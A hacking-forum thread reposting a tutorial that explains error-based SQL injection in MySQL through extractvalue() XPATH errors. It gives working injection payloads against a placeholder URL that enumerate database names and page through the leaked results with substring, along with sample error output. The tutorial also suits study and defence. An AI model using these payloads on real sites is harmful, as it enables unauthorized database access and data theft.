Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Tutorial How does Xpath Injection Work + Modifications – Explained filter_list
Author
Message
How does Xpath Injection Work + Modifications – Explained #1
Hello everyone,

Well it's been a while since I've posted something so here we go.

I've been in a lot of different hacking communities for a long time and as usual most of them are filled with skids that would only memorize the queries shared by others, so if you're one of these ones looking for a "new l337 query to hax0r everybody" then get out of here.

Now, a lot of interesting people still don't know how Error Based Sql Injections works and that's because it's a little bit complex, just like Xpath Injection since we're also retrieving our results from the error that pops up.
I've seen few tutorials explaining Error Based Sql Injection but nothing was really shared, just the explanation of few MySql functions, but the main idea on why the error shows up with the results remains "mysterious". (I know, that sounded like a pirate movie's trailer lol)

Anyways, today we're going to get a public Xpath Injection Query and we're going to explain it and then we're going to use what we learned to create a new Xpath Injection Query that would get the job done at its best, so lets start.

Public Query: http://www.site.com/index.php?id=1 and extractvalue(rand(),concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)))--

So as you can see, we're trying to select the names of the databases one by one using Xpath.

Explanation:

We'll first start by explaining the used functions and then we'll move on to why it's happening and how and we'll end up creating something much better.
  • extractvalue: https://dev.mysql.com/doc/refman/5.1/en/...tractvalue
    Too much text, screw it and follow the examples below:
    Example:
    Query: select extractvalue("<xml><product><title>Something</title></product></xml>", "/product/title")
    Output: Something
    The point of extractvalue is to retrieve data from xml, that's it... In our case we looked for the value of the title tag that could be found in the product tag. Any argument can obviously be passed in a variable. That's all we care about for now...
  • rand: Returns a random floating-point value v in the range 0 &lt;= v &lt; 1.0. https://dev.mysql.com/doc/refman/5.0/en/...ction_rand

So now? How can we use this to cause an error that will pop what we're looking for? The first thing you have to understand here is how queries work when there's too many of them: (It's parentheses and function based)
Example:
Query: select 1,2,(select version()),3
So first, it goes for "select version()" and then it goes for select 1,2,versionhere,3
This is really important, this is what this whole thing is based on, you'll see why in a second.

Also, you have to know that using parentheses in this case is really important, not doing so will ruin it all, keep that in mind too, that's all you need to know to understand this whole thing.:
Query: select 1,2,select version(),3 (won't work)

So lets get back to our public Xpath Injection Query
Public Query: http://www.site.com/index.php?id=1 and extractvalue(rand(),concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)))--

So how is stuff getting executed here?
For the first argument there's nothing but rand() which will get executed and a float number between 0 and 1 will be generated.
Then we have: "select schema_name from information_schema.schemata limit 0,1"
Then goes the rest.

But why do we have an error with the result we selected, here it goes:
The Xpath Error that we get is a Syntax Error which means that there's some character, for example, that's in the wrong place causing the error to pop up. Let me try and explain this even better with few examples:

Example1: select extractvalue("hello", 123)
Works fine and returns 123, that is because extractvalue doesn't really care as long as the arguments are "valid" even if what is being asked for doesn't really exist.
Example2: select extractvalue(123, 14)
Same, but this will return 14
Example3: select extractvalue(123, 1.4.2)
Error: #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.2)' at line 1
Now that is because the second argument of extractvalue isn't between quotes so it's considered as a float but since that float contains 2 dots instead of 1 we got a syntax error that points towards the second dot, this is really important, keep that in mind.
Example4: select extractvalue(123, hello)
Error: #1054 - Unknown column 'hello' in 'field list'
That's also because in mysql, an unquoted string is considered as a column name.
Example5: select extractvalue(123, version())
Error: #1105 - XPATH syntax error: '.41-0+wheezy1'
Here's the thing, we'll go step by step for this one, firstly why does it show a result and secondly why does it show half of it?
Firstly: just like we said before, in MySql everything happens based on parentheses and functions, so in that query, version() got executed and the output of version() was placed instead of the function, obviously, since the function returns the output. Anyways, lets do this ourselves:
Output: version() = 5.5.41-0+wheezy1
Query: select extractvalue(123, 5.5.41-0+wheezy1)
And we get our syntax error, obviously, because our second argument is not a string, or a float or an integer or anything at all, it's something stupid and it holds a lot of weird characters which caused extractvalue to output a syntax error.
Secondly: why only ".41-0+wheezy1" shows up?
Simple, our result is 5.5.41-0+wheezy1 so it first looks like a float for extractvalue and as it goes threw the result it finds a second dot (5.5.) which will make this argument a non float and causes extractvalue to return a syntax error that starts with the second dot and goes till the end.
Now how can we show the full result? We simply have to put a weird character ourselves at the beginning of the second argument, something like a dot or a vowel or whatever and that is because extractvalue will identify that weird character at the beginning of its argument and goes for a syntax error, so lets do this:
Query: select extractvalue(123, (select concat(",", version()))
Output: #1105 - XPATH syntax error: ',5.5.41-0+wheezy1'
Just like we said, the syntax error points towards the weird character and prints it and everything that comes after it. And that's pretty much it folks, before we finish this explanation I would like to point out the parentheses that surrounds the second argument, just like we said before, that is needed.

Creating our own Query and making the creator of the first one look stupid:
Public Query: http://www.site.com/index.php?id=1 and extractvalue(rand(),concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)))--

There's no point of using rand() this way, in that public query rand() will generate a float between 0 and 1 but just like we said, the first argument doesn't matter in this kind of injections so the first argument can be anything, it can be a string, it can be an integer it can be anything, the usage of rand() here is plain stupid, if the author of this query wants to spawn a float somehow he could have just added one.

New Query: http://www.site.com/index.php?id=1 and extractvalue(1,concat(0x7e,(select concat(schema_name) from information_schema.schemata limit 0,1)))--

The second argument is the way it should be but there's no point of using concat to output a single result why can't we just use group_concat and pop everything? Well that is because the XPath Error is made out of 54 chars max and since it starts with "XPATH syntax error: '" and ends with "'" then the result of our query + our weird character to provoke the syntax error at the beginning would only have a length of 31 characters, and that is good, so again, why aren't we using group_concat? Lol.

New Query: http://www.site.com/index.php?id=1 and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)))--

Output: #1105 - XPATH syntax error: ':information_schema,HelloBins,DO'

Now as you can see, it's obvious that the "complete" result requires more than 31 characters, so how do we solve that?
It's simple, we have to jump 31 characters every time and start reading from there and then we will start puzzling. To do that we simply need to use a single string function such as MID, Substring or whatever, so lets do so:

New Query: http://www.site.com/index.php?id=1 and extractvalue(1, concat(0x7e,(select substring(group_concat(schema_name) from 32) from information_schema.schemata)))--
Next: http://www.site.com/index.php?id=1 and extractvalue(1, concat(0x7e,(select substring(group_concat(schema_name) from 63) from information_schema.schemata)))--
etc...

Why 32, 63, etc? because in MySql the first character in a string is indexed as 1 and not 0 like most programming languages.
Anyways, here it is, we just created a proper query that uses Xpath Injection at its best, 31 characters being read and doing it the right and the fastest way.

How about UpdateXML? Same thing, it's also based on a syntax error and we can easily handle it to make it output what we wish for. Same for everything else, there's hundreds of functions in MySql that can be used to go for an Error Based Sql Injection, it's mostly based on syntax errors, so for everyone going crazy on all these "new error based sql injection" calm the fuck down, it's nothing, you can go ahead and create a new "method" right now, be happy Lol.

That's pretty much it for today people,
As usual, thanks for reading and sticking around this blog,
dotcppfile.

Reposted from: http://dotcppfile.wordpress.com/

[+] 3 users Like dotcppfile's post
Reply

RE: How does Xpath Injection Work + Modifications – Explained #2
Your contributions are renowned to be HQ In nature, and this certainly fits In that criteria.

Keep It up.
[Image: AD83g1A.png]

Reply

RE: How does Xpath Injection Work + Modifications – Explained #3
(05-10-2015, 02:46 PM)mothered Wrote: Your contributions are renowned to be HQ In nature, and this certainly fits In that criteria.

Keep It up.

It's been a while mate, anyways, great you liked it and thanks for posting, appreciated.

Reply

RE: How does Xpath Injection Work + Modifications – Explained #4
Great work there. Been the first HQ Post that I saw in the past few days.
Ur damn right, the most forums are full of skids. Cause of that its nice to know somebody with potential is back in business.
Keep going!
______________________________________________________________________________

"There are only 10 types of people in the world: Those who understand binary, and those who don't."

[+] 1 user Likes coax's post
Reply

RE: How does Xpath Injection Work + Modifications – Explained #5
Awesome tutorial. Very clear and detailed. Good job!

Reply

RE: How does Xpath Injection Work + Modifications – Explained #6
You made tutorial but didnt explain shit. SkidHacker is not happy with this post >.> Such wizardy you must be 1337 kid who contracts for gov agencies as a hacker xD

Reply